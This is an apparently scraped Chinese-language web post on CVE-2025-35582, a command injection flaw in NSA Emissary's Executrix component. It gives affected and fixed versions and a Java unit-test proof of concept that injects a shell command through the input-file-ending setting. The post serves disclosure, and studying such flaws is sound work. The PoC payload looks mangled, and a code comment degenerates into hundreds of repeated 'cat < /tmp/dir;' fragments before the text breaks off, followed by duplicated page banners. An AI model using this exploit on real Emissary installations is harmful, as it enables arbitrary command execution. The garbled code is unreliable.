NSA Emissary CVE-2025-35582 命令注入漏洞及POC

漏洞总结：Executrix 命令注入漏洞 漏洞概述 漏洞名称：OS Command Injection via Unvalidated / in 'Executrix' 漏洞类型：操作系统命令注入 (CWE-78) 严重程度：高危 (CVSS v3 8.8/10) CVE ID：CVE-2025-35582 核心问题： 组件在构建 shell 命令时，将 和 配置项的值直接拼接到 字符串中，且未进行任何转义或验证。攻击者可通过设置恶意后缀值，注入任意 OS 命令。 影响范围： 受影响版本： (Maven) <= 8.42.0 修复版本：8.43.0 权限要求：无需运行时特权，仅需配置文件的写权限。 --- 修复方案 升级版本：将 升级至 8.43.0 或更高版本。 代码层面：下游实现者需确保对 和 等配置值进行严格的验证或转义，目前框架层缺乏此类安全机制。 --- 概念验证 (POC) 代码 1. PoC 1: Docker 环境利用脚本 以下脚本用于在 Docker 环境中验证漏洞，通过修改配置文件触发命令注入。 2. PoC 2: Java 单元测试代码 以下代码展示了如何在 Java 单元测试中直接调用 API 触发命令注入。 ```java package emissary.util.shell; import org.junit.jupiter.api.Test; import org.junit.jupiter.api.condition.DisabledOnOs; import org.junit.jupiter.api.condition.OS; import org.junit.jupiter.api.io.TempDir; import java.nio.file.Files; import java.nio.file.Path; import static org.junit.jupiter.api.Assertions.assertTrue; / PoC: IN_FILE_ENDING is concatenated into shell paths without escaping. enabling command injection via getCommand(). Mirrors exactly what UnixCommandPlace.runCommand() does: - TempFileNames names = executrix.createTempFileNames(); - String[] cmd = executrix.getCommand(names); - executrix.execute(cmd, ...); */ @DisabledOnOs(OS.WINDOWS) class ExecutrixShellInjectionPoCTest { @Test void testInFileEndingInjectedIntoShellCommand(@TempDir Path tempDir) throws Exception { // Path marker = tempDir.resolve("pwned"); // Backtick substitution: avoids the Java regex $-group issue in replaceAll() // while still demonstrating the shell executes the injected expression. String payload = "touch " + marker.toAbsolutePath() + " "; Executrix executrix = new Executrix(); executrix.setTempDir(tempDir.toString()); executrix.setCommand("cat -i\\nINPUT_PATH\\n"); // mirrors UnixCommandPlace default executrix.setInFileEnding(payload); // No validation - accepted as-is // --- path taken by UnixCommandPlace.runCommand() --- TempFileNames names = executrix.createTempFileNames(); String[] cmd = executrix.getCommand(names); // cmd[2] = "/bin/sh -c ulimit -c 0; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tmp/dir; cat < /tm

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

NSA Emissary CVE-2025-35582 命令注入漏洞及POC

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

NSA Emissary CVE-2025-35582 命令注入漏洞及POC

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！